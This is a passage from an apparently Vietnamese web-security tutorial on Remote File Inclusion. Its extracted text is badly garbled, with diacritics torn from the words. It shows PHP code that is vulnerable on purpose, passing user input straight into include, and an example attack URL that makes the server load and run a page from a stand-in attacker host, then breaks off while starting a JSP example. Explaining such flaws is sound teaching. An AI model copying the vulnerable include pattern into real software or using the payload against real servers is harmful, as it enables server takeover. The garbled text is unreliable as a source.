c máy c a ng i dùng và phía máy ch . nh h ng c a ki u t n công ả ủ ườ ủ Ả ưở ủ ể ấ
này thay đ i t đánh c p t m th i session token ho c các d li u c a ổ ừ ắ ạ ờ ặ ữ ệ ủ
ng i dùng cho đ n vi c t i lên các webshell, mã đ c nh m đ n xâm h i ườ ế ệ ả ộ ằ ế ạ
hoàn toàn h th ng máy ch .ệ ố ủ
Khai thác l h ng Remote file inclusion trong PHPỗ ổ
PHP có nguy c cao b t n công RFI do vi c s d ng l nh include r t ơ ị ấ ệ ử ụ ệ ấ
nhi u và thi t đ t m c đ nh c a server cũng nh h ng m t ph n nào đó. ề ế ặ ặ ị ủ ả ưở ộ ầ
Đ b t đ u chúng ta c n tìm n i ch a file include trong ng d ng ph ể ắ ầ ầ ơ ứ ứ ụ ụ
thu c vào d li u đ u vào ng i dùng.ộ ữ ệ ầ ườ
1. M t trong nh ng n i ch a l h ng có th nh ví d d i đây, giá ộ ữ ơ ứ ỗ ổ ể ư ụ ướ
tr c a ‘testfile’ đ c cung c p b i ng i dùng:ị ủ ượ ấ ở ườ
www.victim_site.com/abc.php?testfile=example
2. Mã ngu n PHP ch a l h ng:ồ ứ ỗ ổ
$test = $_REQUEST[“testfile”];
Include($test.”.php”);
3. Thông s c a ‘testfile’ đ c l y t phía ng i dùng. Đo n mã s ố ủ ượ ấ ừ ườ ạ ẽ
l y giá tr ‘testfile’ và tr c ti p include nó vào file PHP.ấ ị ự ế
4. Sau đây là ví d v m t h ng t n công đ c s d ng đ i v i ụ ề ộ ướ ấ ượ ử ụ ố ớ
đo n mã trên:ạ
www.victim_site.com/abc.php?
test=http://www.attacker_site.com/attack_page
File “attack_page” đ c bao hàm vào trang có s n trên máy ch và th c thi ượ ẵ ủ ự
m i khi trang “abc.php” đ c truy c p. Tin t c s đ a mã đ c vào ỗ ượ ậ ặ ẽ ư ộ
“attack_page” và th c hi n hành vi đ c h i.ự ệ ộ ạ
Khai thác Remote file inclusion trong JSP
1. Gi s m t k ch b n n i m t trang JSP s d ng “c:import” nh m ả ử ộ ị ả ơ ộ ử ụ ằ
nh p m t tên t p tin nào đó do ng i dùng cung c p vào trang JSP ậ ộ ệ ườ ấ
hi n t i thông qua bi n đ u vào ‘test’:ệ ạ ế ầ